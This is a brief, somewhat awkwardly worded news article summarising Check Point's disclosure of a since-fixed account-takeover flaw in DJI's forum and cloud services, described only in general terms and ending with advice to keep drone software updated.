Lets start from the end, check your DJI Drone software.
Check Point’s researchers continue to discover weaknesses and breaches in products that are widely used by organizations such as the police and the military, as well as private users. This time, DJI is the most recognized manufacturer of drones in the market today.
Check Point found that attackers can access users’ accounts, thus gaining control over the drone, images he took, and of course watching in real time what the drone is doing. In addition, the attackers can obtain information about the position of the drifter flight using a log that exists in the drone.
The loophole that allows the attack is in a DJI forum where registered users can chat about the company’s products and get help from other users. What happens is that the user logs in and clicks on a link that is embedded by the attackers and at the same time the information of his account is in their possession, the link looks very innocent and even typed by a real user.
When the login is received, the attacker takes control of the account, which means that he can make purchases on the online store, send messages on his behalf and of course access the DJI cloud services.
On the Check Point website, the researchers point out the way to find the weakness and the work that the DJI site relied on cookies and actually enabled the attackers to get information about users and the details that were also kept very unsafe so that sensitive user information came to attack without a problem. In addition, they explain at length how the attackers perform the takeover step-by-step and how they exploit the weaknesses of the DJI on the mobile and on the regular site (surfing through the desktop).
The breach was fixed as soon as DJI received the details from Check Point’s researchers and therefore it is important to keep up-to-date with the latest versions of the hardware (the drone) and the software.